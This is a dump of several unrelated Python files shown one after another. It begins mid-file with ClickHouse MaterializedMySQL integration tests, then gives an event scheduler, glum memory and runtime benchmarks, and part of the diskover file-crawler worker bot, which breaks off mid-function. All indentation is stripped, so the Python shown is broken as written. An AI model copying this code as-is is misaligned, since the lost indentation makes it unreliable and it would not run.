check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n500\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum16_test")
mysql_node.query("DROP DATABASE materialize_with_enum16_test")
def alter_enum8_to_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
mysql_node.query("CREATE DATABASE alter_enum8_to_enum16_test")
enum8_values_count = 100
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE alter_enum8_to_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE alter_enum8_to_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'alter_enum8_to_enum16_test', 'root', 'clickhouse')".format(service_name))
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (3, '75')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("ALTER TABLE alter_enum8_to_enum16_test.test MODIFY COLUMN value ENUM(" + enum16_values + ")")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (4, '500')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n500\n")
clickhouse_node.query("DROP DATABASE alter_enum8_to_enum16_test")
mysql_node.query("DROP DATABASE alter_enum8_to_enum16_test")
def move_to_prewhere_and_column_filtering(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("CREATE DATABASE cond_on_key_col")
clickhouse_node.query("CREATE DATABASE cond_on_key_col ENGINE = MaterializedMySQL('{}:3306', 'cond_on_key_col', 'root', 'clickhouse')".format(service_name))
mysql_node.query("create table cond_on_key_col.products (id int primary key, product_id int not null, catalog_id int not null, brand_id int not null, name text)")
mysql_node.query("insert into cond_on_key_col.products (id, name, catalog_id, brand_id, product_id) values (915, 'ertyui', 5287, 15837, 0), (990, 'wer', 1053, 24390, 1), (781, 'qwerty', 1041, 1176, 2);")
mysql_node.query("create table cond_on_key_col.test (id int(11) NOT NULL AUTO_INCREMENT, a int(11) DEFAULT NULL, b int(11) DEFAULT NULL, PRIMARY KEY (id)) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;")
mysql_node.query("insert into cond_on_key_col.test values (42, 123, 1);")
mysql_node.query("CREATE TABLE cond_on_key_col.balance_change_record (id bigint(20) NOT NULL AUTO_INCREMENT, type tinyint(4) DEFAULT NULL, value decimal(10,4) DEFAULT NULL, time timestamp NULL DEFAULT NULL, "
"initiative_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, passivity_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"person_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, tenant_code varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"created_time timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', updated_time timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, "
"value_snapshot decimal(10,4) DEFAULT NULL, PRIMARY KEY (id), KEY balance_change_record_initiative_id (person_id) USING BTREE, "
"KEY type (type) USING BTREE, KEY balance_change_record_type (time) USING BTREE, KEY initiative_id (initiative_id) USING BTREE, "
"KEY balance_change_record_tenant_code (passivity_id) USING BTREE, KEY tenant_code (tenant_code) USING BTREE) ENGINE=InnoDB AUTO_INCREMENT=1691049 DEFAULT CHARSET=utf8")
mysql_node.query("insert into cond_on_key_col.balance_change_record values (123, 1, 3.14, null, 'qwe', 'asd', 'zxc', 'rty', null, null, 2.7);")
mysql_node.query("CREATE TABLE cond_on_key_col.test1 (id int(11) NOT NULL AUTO_INCREMENT, c1 varchar(32) NOT NULL, c2 varchar(32), PRIMARY KEY (id)) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4")
mysql_node.query("insert into cond_on_key_col.test1(c1,c2) values ('a','b'), ('c', null);")
check_query(clickhouse_node, "SELECT DISTINCT P.id, P.name, P.catalog_id FROM cond_on_key_col.products P WHERE P.name ILIKE '%e%' and P.catalog_id=5287", '915\tertyui\t5287\n')
check_query(clickhouse_node, "select count(a) from cond_on_key_col.test where b = 1;", "1\n")
check_query(clickhouse_node, "select id from cond_on_key_col.balance_change_record where type=1;", "123\n")
check_query(clickhouse_node, "select count(c1) from cond_on_key_col.test1 where c2='b';", "1\n")
clickhouse_node.query("DROP DATABASE cond_on_key_col")
mysql_node.query("DROP DATABASE cond_on_key_col")
def mysql_settings_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database")
mysql_node.query("CREATE TABLE test_database.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("INSERT INTO test_database.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO test_database.a VALUES(2, 'bar')")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM test_database.a FORMAT TSV", "2\n")
assert clickhouse_node.query("SELECT COUNT(DISTINCT blockNumber()) FROM test_database.a FORMAT TSV") == "2\n"
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_large_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS largetransaction")
clickhouse_node.query("DROP DATABASE IF EXISTS largetransaction")
mysql_node.query("CREATE DATABASE largetransaction")
mysql_node.query("CREATE TABLE largetransaction.test_table ("
"`key` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, "
"`value` INT NOT NULL) ENGINE = InnoDB;")
num_rows = 200000
rows_per_insert = 5000
values = ",".join(["(1)" for _ in range(rows_per_insert)])
for i in range(num_rows//rows_per_insert):
mysql_node.query(f"INSERT INTO largetransaction.test_table (`value`) VALUES {values};")
clickhouse_node.query("CREATE DATABASE largetransaction ENGINE = MaterializedMySQL('{}:3306', 'largetransaction', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table", f"{num_rows}\n")
mysql_node.query("UPDATE largetransaction.test_table SET value = 2;")
# Attempt to restart clickhouse after it has started processing
# the transaction, but before it has completed it.
while int(clickhouse_node.query("SELECT COUNT() FROM largetransaction.test_table WHERE value = 2")) == 0:
time.sleep(0.2)
clickhouse_node.restart_clickhouse()
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table WHERE value = 2", f"{num_rows}\n")
clickhouse_node.query("DROP DATABASE largetransaction")
mysql_node.query("DROP DATABASE largetransaction")
def table_table(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_test")
clickhouse_node.query("DROP DATABASE IF EXISTS table_test")
mysql_node.query("CREATE DATABASE table_test")
# Test that the table name 'table' work as expected
mysql_node.query("CREATE TABLE table_test.table (id INT UNSIGNED PRIMARY KEY)")
mysql_node.query("INSERT INTO table_test.table VALUES (0),(1),(2),(3),(4)")
clickhouse_node.query("CREATE DATABASE table_test ENGINE=MaterializeMySQL('{}:3306', 'table_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT(*) FROM table_test.table", "5\n")
mysql_node.query("DROP DATABASE table_test")
clickhouse_node.query("DROP DATABASE table_test")
def table_overrides(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_overrides")
clickhouse_node.query("DROP DATABASE IF EXISTS table_overrides")
mysql_node.query("CREATE DATABASE table_overrides")
mysql_node.query("CREATE TABLE table_overrides.t1 (sensor_id INT UNSIGNED, timestamp DATETIME, temperature FLOAT, PRIMARY KEY(timestamp, sensor_id))")
for id in range(10):
mysql_node.query("BEGIN")
for day in range(100):
mysql_node.query(f"INSERT INTO table_overrides.t1 VALUES({id}, TIMESTAMP('2021-01-01') + INTERVAL {day} DAY, (RAND()*20)+20)")
mysql_node.query("COMMIT")
clickhouse_node.query(f"""
CREATE DATABASE table_overrides ENGINE=MaterializeMySQL('{service_name}:3306', 'table_overrides', 'root', 'clickhouse')
TABLE OVERRIDE t1 (COLUMNS (sensor_id UInt64))
""")
check_query(clickhouse_node, "SELECT count() FROM table_overrides.t1", "1000\n")
check_query(clickhouse_node, "SELECT type FROM system.columns WHERE database = 'table_overrides' AND table = 't1' AND name = 'sensor_id'", "UInt64\n")
clickhouse_node.query("DROP DATABASE IF EXISTS table_overrides")
mysql_node.query("DROP DATABASE IF EXISTS table_overrides")
|
events_process.py
|
from . import user
from . import db
import multiprocessing as mp
import threading as thr
import time
def init(instance_path):
queue = mp.Queue()
p = mp.Process(target=checkEvents, args=(instance_path, queue,))
p.daemon = True
p.start()
t = thr.Thread(target=checkQueue, args=(queue,))
t.daemon = True
t.start()
def checkQueue(queue : mp.Queue):
while(True):
dbo = None
try:
(uId, newTask) = queue.get()
usr = user.getById(uId)
dbo = db.createDb(usr.name)
from . import task
task.start(dbo, uId, newTask)
from . import pipeline_task as pt
pt.setChange(dbo, newTask.pplTaskId, True)
except Exception as err:
print("startNewTask failed: {0}".format(str(err)))
finally:
if dbo:
db.closeDb(dbo)
def checkEvents(instance_path : str, queue : mp.Queue):
startTime = time.time()
while(True):
deltaTimeSec = time.time() - startTime
startTime = time.time()
currTimeStr = time.strftime('%H:%M', time.localtime())
currDateTimeStr = time.strftime('%Y-%m-%d %H:%M', time.localtime())
for usr in user.allWithPath(instance_path):
dbo = None
try:
dbo = db.createDbWithPath(instance_path, usr.name)
if (dbo is None):
continue
from . import event
evts = event.allWithDB(dbo)
for evt in evts:
if (not evt.isEnabled):
continue
if evt.timeStartEverySec > 0:
evt.timeLastStartEverySec += deltaTimeSec
if evt.timeLastStartEverySec > evt.timeStartEverySec:
startTask(evt, dbo, usr, queue)
evt.timeLastStartEverySec = 0.0
for stTime in evt.timeStartOnceOfDay:
if (currTimeStr == stTime) and (evt.timeLastStartOnceOfDay != currTimeStr):
startTask(evt, dbo, usr, queue)
evt.timeLastStartOnceOfDay = currTimeStr
elif (currDateTimeStr == stTime) and (evt.timeLastStartOnceOfDay != currDateTimeStr):
startTask(evt, dbo, usr, queue)
evt.timeLastStartOnceOfDay = currDateTimeStr
event.updateLastStartTime(dbo, evt)
except Exception as err:
print("checkEvents failed: {0}".format(str(err)))
finally:
if dbo:
db.closeDb(dbo)
deltaTimeSec = time.time() - startTime
maxElapseTimeSec = 1.0
if (maxElapseTimeSec - deltaTimeSec) > 0.0:
time.sleep(maxElapseTimeSec - deltaTimeSec)
def startTask(evt, dbo, usr, queue):
for tId in evt.tasksForStart:
from . import pipeline_task as pt
pplTask = pt.get(dbo, tId)
if pplTask.isEnabled:
from . import task
newTask = task.Task(tId, starterEventId=evt.id, ttlId=pplTask.ttId)
newTask.params = pplTask.params
queue.put((usr.id, newTask,))
|
test_performance.py
|
import gc
import multiprocessing as mp
import time
import warnings
from threading import Thread
from typing import List, Optional
import numpy as np
import pandas as pd
import psutil
import scipy.sparse as sps
import tabmat as tm
from glum import GeneralizedLinearRegressor
from glum_benchmarks.cli_run import get_all_problems
from glum_benchmarks.util import get_sklearn_family, runtime
def _get_memory_usage() -> int:
return psutil.Process().memory_info().rss
class MemoryPoller:
"""
Sample memory and compute useful statistics.
Example usage:
with MemoryPoller() as mp:
do some stuff here
print('initial memory usage', mp.initial_memory)
print('max memory usage', mp.max_memory)
excess_memory_used = mp.max_memory - mp.initial_memory
"""
def _poll_max_memory_usage(self):
while not self.stop_polling:
self.memory_usage.append(_get_memory_usage())
self.max_memory: int = max(self.max_memory, self.memory_usage[-1])
time.sleep(1e-4)
def __enter__(self):
"""See example usage above."""
self.stop_polling = False
self.max_memory = 0
self.initial_memory = _get_memory_usage()
self.memory_usage: List[int] = [self.initial_memory]
self.t = Thread(target=self._poll_max_memory_usage)
self.t.start()
return self
def __exit__(self, *excargs):
"""Stop polling memory usage."""
self.stop_polling = True
self.t.join()
def _get_x_bytes(x) -> int:
if isinstance(x, np.ndarray):
return x.nbytes
if sps.issparse(x):
return sum(
mat.data.nbytes + mat.indices.nbytes + mat.indptr.nbytes
for mat in [x, x.x_csr]
)
if isinstance(x, tm.CategoricalMatrix):
return x.indices.nbytes
if isinstance(x, tm.SplitMatrix):
return sum(_get_x_bytes(elt) for elt in x.matrices)
raise NotImplementedError(f"Can't get bytes for matrix of type {type(x)}.")
def _runner(storage, copy_X: Optional[bool]):
gc.collect()
P = get_all_problems()["wide-insurance-no-weights-lasso-poisson"]
dat = P.data_loader(num_rows=100000, storage=storage)
# Measure how much memory we are using before calling the GLM code
if isinstance(dat["X"], pd.DataFrame):
X = dat["X"].to_numpy()
elif sps.issparse(dat["X"]):
X = tm.SparseMatrix(dat["X"])
elif isinstance(dat["X"], tm.SplitMatrix):
X = dat["X"]
data_memory = _get_x_bytes(X)
y = dat["y"]
del dat
gc.collect()
with MemoryPoller() as mp:
for _ in range(4):
model = GeneralizedLinearRegressor(
family="poisson",
l1_ratio=1.0,
alpha=0.01,
force_all_finite=False,
copy_X=copy_X,
)
model.fit(X=X, y=y)
excess_memory_used = mp.max_memory - mp.initial_memory
extra_to_initial_ratio = excess_memory_used / data_memory
import matplotlib.pyplot as plt
graph = (np.array(mp.memory_usage) - mp.initial_memory) / data_memory
plt.plot(graph)
plt.ylabel("Memory (fraction of X)")
plt.xlabel("Time (1e-4s)")
plt.savefig(f"performance/memory_{storage}_copy_{copy_X}.png")
return extra_to_initial_ratio
def _make_memory_usage_plots():
# These values are around double the empirical extra memory used. They inc
# They increase from dense->sparse->split->cat, because the matrix itself takes less
# and less memory to store, so all the temporary vectors of length n_rows start to
# dominate the memory usage.
storage_allowed_ratio = {"dense": 0.1, "sparse": 0.45, "cat": 1.3, "split0.1": 0.55}
for storage, allowed_ratio in storage_allowed_ratio.items():
for copy_X in [False, True, None]:
with mp.Pool(1) as p:
extra_to_initial_ratio = p.starmap(_runner, [(storage, copy_X)])[0]
if copy_X is not None and copy_X:
if extra_to_initial_ratio < 1:
warnings.warn(
f"Used less memory than expected with copy_X = True and "
f"data format {storage}. Memory exceeded initial memory by "
f"{extra_to_initial_ratio}."
)
else:
if extra_to_initial_ratio > allowed_ratio:
warnings.warn(
f"Used more memory than expected with copy_X = {copy_X} and "
f"data format {storage}. Memory exceeded initial memory by "
f"{extra_to_initial_ratio}; expected less than {allowed_ratio}."
)
def get_spmv_runtime():
"""
Get runtime of sparse matrix-vector product.
Sparse matrix-vector product runtime should be representative of the memory
bandwidth of the machine. Automatically scale the according to half the
number of cores since the scipy.sparse implementation is not parallelized
and glum is parallelized.
"""
N = 20000000
diag_data = np.random.rand(5, N)
mat = sps.spdiags(diag_data, [0, 1, -1, 2, -2], N, N).tocsr()
v = np.random.rand(N)
return runtime(lambda: mat.dot(v), 5)[0] / (mp.cpu_count() // 2)
def get_dense_inv_runtime():
"""
Get runtime of dense matrix inverse.
Dense matrix multiplication runtime should be representative of the
floating point performance of the machine.
"""
N = 1300
X = np.random.rand(N, N)
return runtime(lambda: np.linalg.inv(X), 5)[0]
def runtime_checker():
"""
Run various operations and check that glum doesn't run too much
slower than operations expected to be similar. This isn't a perfect test
but it'll raise a red flag if the code has unexpectedly gotten much slower.
"""
spmv_runtime = get_spmv_runtime()
dense_inv_runtime = get_dense_inv_runtime()
what_to_check = [
("dense", "narrow-insurance-no-weights-lasso", "poisson", 200000, 1.5),
("sparse", "narrow-insurance-weights-l2", "gaussian", 200000, 2.5),
("cat", "wide-insurance-no-weights-l2", "gamma", 100000, 2.5),
("split0.1", "wide-insurance-offset-lasso", "tweedie-p=1.5", 100000, 3.0),
("split0.1", "intermediate-insurance-no-weights-net", "binomial", 200000, 1.0),
]
for storage, problem, distribution, num_rows, limit in what_to_check:
P = get_all_problems()[problem + "-" + distribution]
dat = P.data_loader(num_rows=num_rows, storage=storage)
family = get_sklearn_family(distribution)
model = GeneralizedLinearRegressor(
family=family,
l1_ratio=1.0,
alpha=0.01,
copy_X=False,
force_all_finite=False,
)
min_runtime, result = runtime(lambda: model.fit(X=dat["X"], y=dat["y"]), 5)
# Let's just guess that we're about half flop-limited and half
# memory-limited. This is a decent guess because the sandwich product is
# mostly flop-limited in the dense case and the dense case generally
# dominates even when we're using split or categorical. On the other hand,
# everything besides the sandwich product is probably memory limited.
denominator = 0.5 * dense_inv_runtime + 0.5 * spmv_runtime
if min_runtime / denominator > limit:
warnings.warn(
f"runtime {min_runtime} is greater than the expected maximum runtime "
f"of {limit * denominator}"
)
if __name__ == "__main__":
# make_memory_usage_plots()
runtime_checker()
|
diskover_worker_bot.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
import diskover
from redis import Redis
from rq import Worker, Connection
from datetime import datetime
import argparse
import os
import hashlib
import socket
import pwd
import grp
import time
import logging
import re
import base64
try:
from Queue import Queue as pyQueue
except ImportError:
from queue import Queue as pyQueue
from threading import Thread
# cache uid/gid names
uids = []
gids = []
owners = {}
groups = {}
# create Elasticsearch connection
es = diskover.elasticsearch_connect(diskover.config)
# create Reddis connection
redis_conn = Redis(host=diskover.config['redis_host'], port=diskover.config['redis_port'],
password=diskover.config['redis_password'])
def parse_cli_args():
"""This is the parse CLI arguments function.
It parses command line arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--burst", action="store_true",
help="Burst mode (worker will quit after all work is done)")
parser.add_argument("-q", "--queue", metavar="QUEUE", nargs="+", default=None,
help="Queue worker bot should listen on \
(queues: diskover, diskover_crawl, diskover_calcdir) (default all)")
args = parser.parse_args()
return args
def bot_log_setup():
bot_logger = logging.getLogger('diskover_worker_bot')
bot_logger.setLevel(logging.INFO)
rq_logger = logging.getLogger('rq.worker')
rq_logger.setLevel(logging.INFO)
es_logger = logging.getLogger('elasticsearch')
es_logger.setLevel(logging.WARNING)
if diskover.config['botlogs'] == "True" or \
diskover.config['botlogs'] == "true":
botlogfile = 'diskover_bot_worker_' + get_worker_name() \
+ '_' + str(int(time.time())) + '_log'
fh = logging.FileHandler(os.path.join(diskover.config['botlogfiledir'], botlogfile))
fh.setLevel(logging.INFO)
bot_logger.addHandler(fh)
logging.addLevelName(
logging.INFO, "\033[1;32m%s\033[1;0m"
% logging.getLevelName(logging.INFO))
logging.addLevelName(
logging.WARNING, "\033[1;31m%s\033[1;0m"
% logging.getLevelName(logging.WARNING))
logging.addLevelName(
logging.ERROR, "\033[1;41m%s\033[1;0m"
% logging.getLevelName(logging.ERROR))
logging.addLevelName(
logging.DEBUG, "\033[1;33m%s\033[1;0m"
% logging.getLevelName(logging.DEBUG))
logformatter = '%(asctime)s [%(levelname)s][%(name)s] %(message)s'
loglevel = logging.INFO
logging.basicConfig(format=logformatter, level=loglevel)
return bot_logger
def get_worker_name():
"""This is the get worker name function.
It returns worker name hostname.pid .
"""
return '{0}.{1}'.format(socket.gethostname().partition('.')[0], os.getppid())
def auto_tag(metadict, type, mtime, atime, ctime):
"""This is the auto tag function.
It checks diskover config for any auto tag patterns
and updates the meta dict for file or directory
to include the new tags.
"""
extpass = True
namepass = True
pathpass = True
timepass = True
if type == 'file':
for pattern in diskover.config['autotag_files']:
try:
for name in pattern['name_exclude']:
if name.startswith('*') and name.endswith('*'):
name = name.replace('*', '')
if re.search(name, metadict['filename']):
return metadict
elif name.startswith('*'):
name = name + '$'
if re.search(name, metadict['filename']):
return metadict
elif name.endswith('*'):
name = '^' + name
if re.search(name, metadict['filename']):
return metadict
else:
if name == metadict['filename']:
return metadict
except KeyError:
pass
try:
for path in pattern['path_exclude']:
if path.startswith('*') and path.endswith('*'):
path = path.replace('*', '')
if re.search(path, metadict['path_parent']):
return metadict
elif path.startswith('*'):
path = path + '$'
if re.search(path, metadict['path_parent']):
return metadict
elif path.endswith('*'):
path = '^' + path
if re.search(path, metadict['path_parent']):
return metadict
else:
if path == metadict['path_parent']:
return metadict
except KeyError:
pass
try:
for ext in pattern['ext']:
if ext.startswith('*') and ext.endswith('*'):
ext = ext.replace('*', '')
if re.search(ext, metadict['extension']):
extpass = True
break
else:
extpass = False
elif ext.startswith('*'):
ext = ext + '$'
if re.search(ext, metadict['extension']):
extpass = True
break
else:
extpass = False
elif ext.endswith('*'):
ext = '^' + ext
if re.search(ext, metadict['extension']):
extpass = True
break
else:
extpass = False
else:
if ext == metadict['extension']:
extpass = True
break
else:
extpass = False
except KeyError:
pass
try:
for name in pattern['name']:
if name.startswith('*') and name.endswith('*'):
name = name.replace('*', '')
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
elif name.startswith('*'):
name = name + '$'
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
elif name.endswith('*'):
name = '^' + name
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
else:
if name == metadict['filename']:
namepass = True
break
else:
namepass = False
except KeyError:
pass
try:
for path in pattern['path']:
if path.startswith('*') and path.endswith('*'):
path = path.replace('*', '')
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
elif path.startswith('*'):
path = path + '$'
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
elif path.endswith('*'):
path = '^' + path
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
else:
if path == metadict['path_parent']:
pathpass = True
break
else:
pathpass = False
except KeyError:
pass
timepass = auto_tag_time_check(pattern, mtime, atime, ctime)
if extpass and namepass and pathpass and timepass:
metadict['tag'] = pattern['tag']
metadict['tag_custom'] = pattern['tag_custom']
return metadict
elif type == 'directory':
for pattern in diskover.config['autotag_dirs']:
try:
for name in pattern['name_exclude']:
if name.startswith('*') and name.endswith('*'):
name = name.replace('*', '')
if re.search(name, metadict['filename']):
return metadict
elif name.startswith('*'):
name = name + '$'
if re.search(name, metadict['filename']):
return metadict
elif name.endswith('*'):
name = '^' + name
if re.search(name, metadict['filename']):
return metadict
else:
if name == metadict['filename']:
return metadict
except KeyError:
pass
try:
for path in pattern['path_exclude']:
if path.startswith('*') and path.endswith('*'):
path = path.replace('*', '')
if re.search(path, metadict['path_parent']):
return metadict
elif path.startswith('*'):
path = path + '$'
if re.search(path, metadict['path_parent']):
return metadict
elif path.endswith('*'):
path = '^' + path
if re.search(path, metadict['path_parent']):
return metadict
else:
if path == metadict['path_parent']:
return metadict
except KeyError:
pass
try:
for name in pattern['name']:
if name.startswith('*') and name.endswith('*'):
name = name.replace('*', '')
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
elif name.startswith('*'):
name = name + '$'
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
elif name.endswith('*'):
name = '^' + name
if re.search(name, metadict['filename']):
namepass = True
break
else:
namepass = False
else:
if name == metadict['filename']:
namepass = True
break
else:
namepass = False
except KeyError:
pass
try:
for path in pattern['path']:
if path.startswith('*') and path.endswith('*'):
path = path.replace('*', '')
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
elif path.startswith('*'):
path = path + '$'
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
elif path.endswith('*'):
path = '^' + path
if re.search(path, metadict['path_parent']):
pathpass = True
break
else:
pathpass = False
else:
if path == metadict['path_parent']:
pathpass = True
break
else:
pathpass = False
except KeyError:
pass
timepass = auto_tag_time_check(pattern, mtime, atime, ctime)
if extpass and namepass and pathpass and timepass:
metadict['tag'] = pattern['tag']
metadict['tag_custom'] = pattern['tag_custom']
return metadict
def auto_tag_time_check(pattern, mtime, atime, ctime):
timepass = True
try:
if pattern['mtime'] > 0 and mtime:
# Convert time in days to seconds
time_sec = pattern['mtime'] * 86400
file_mtime_sec = time.time() - mtime
# Only tag files modified at least x days ago
if file_mtime_sec < time_sec:
timepass = False
except KeyError:
pass
try:
if pattern['atime'] > 0 and atime:
time_sec = pattern['atime'] * 86400
file_atime_sec = time.time() - atime
if file_atime_sec < time_sec:
timepass = False
except KeyError:
pass
try:
if pattern['ctime'] > 0 and ctime:
time_sec = pattern['ctime'] * 86400
file_ctime_sec = time.time() - ctime
if file_ctime_sec < time_sec:
timepass = False
except KeyError:
pass
return timepass
def get_dir_meta(worker_name, path, cliargs, reindex_dict):
"""This is the get directory meta data function.
It gets directory metadata and returns dir meta dict.
It checks if meta data is in Redis and compares times
mtime and ctime on disk compared to Redis and if same
returns sametimes string.
"""
try:
lstat_path = os.lstat(path)
mtime_unix = lstat_path.st_mtime
mtime_utc = datetime.utcfromtimestamp(mtime_unix) \
.strftime('%Y-%m-%dT%H:%M:%S')
atime_unix = lstat_path.st_atime
atime_utc = datetime.utcfromtimestamp(atime_unix) \
.strftime('%Y-%m-%dT%H:%M:%S')
ctime_unix = lstat_path.st_ctime
ctime_utc = datetime.utcfromtimestamp(ctime_unix) \
.strftime('%Y-%m-%dT%H:%M:%S')
if cliargs['index2']:
# check if directory times cached in Redis
redis_dirtime = redis_conn.get(base64.encodestring(path.encode('utf-8', errors='ignore')))
if redis_dirtime:
cached_times = float(redis_dirtime.decode('utf-8'))
# check if cached times are the same as on disk
current_times = float(mtime_unix + ctime_unix)
if cached_times == current_times:
return "sametimes"
# get time now in utc
indextime_utc = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
# get user id of owner
uid = lstat_path.st_uid
# try to get owner user name
# first check cache
if uid in uids:
owner = owners[uid]
# not in cache
else:
try:
owner = pwd.getpwuid(uid).pw_name.split('\\')
# remove domain before owner
if len(owner) == 2:
owner = owner[1]
else:
owner = owner[0]
# if we can't find the owner's user name, use the uid number
except KeyError:
owner = uid
# store it in cache
if not uid in uids:
uids.append(uid)
owners[uid] = owner
# get group id
gid = lstat_path.st_gid
# try to get group name
# first check cache
if gid in gids:
group = groups[gid]
# not in cache
else:
try:
group = grp.getgrgid(gid).gr_name.split('\\')
# remove domain before group
if len(group) == 2:
group = group[1]
else:
group = group[0]
# if we can't find the group name, use the gid number
except KeyError:
group = gid
# store in cache
if not gid in gids:
gids.append(gid)
groups[gid] = group
inode = lstat_path.st_ino
hardlinks = lstat_path.st_nlink
filename = os.path.basename(path)
parentdir = os.path.abspath(os.path.join(path, os.pardir))
fullpath = os.path.abspath(os.path.join(parentdir, filename))
dirmeta_dict = {
"filename": filename,
"path_parent": parentdir,
"filesize": 0,
"items": 1, # 1 for itself
"items_files": 0,
"items_subdirs": 0,
"last_modified": mtime_utc,
"last_access": atime_utc,
"last_change": ctime_utc,
"hardlinks": hardlinks,
"inode": inode,
"owner": owner,
"group": group,
"tag": "",
"tag_custom": "",
"indexing_date": indextime_utc,
"worker_name": worker_name,
"change_percent_filesize": "",
"change_percent_items": "",
"change_percent_items_files": "",
"change_percent_items_subdirs": "",
"_type": "directory"
}
# check plugins for adding extra meta data to dirmeta_dict
for plugin in diskover.plugins:
try:
# check if plugin is for directory doc
mappings = {'mappings': {'directory': {'properties': {}}}}
plugin.add_mappings(mappings)
dirmeta_dict.update(plugin.add_meta(fullpath))
except KeyError:
pass
# add any autotags to dirmeta_dict
if cliargs['autotag'] and len(diskover.config['autotag_dirs']) > 0:
auto_tag(dirmeta_dict, 'directory', mtime_unix, atime_unix, ctime_unix)
# search for and copy over any existing tags from reindex_dict
for sublist in reindex_dict['directory']:
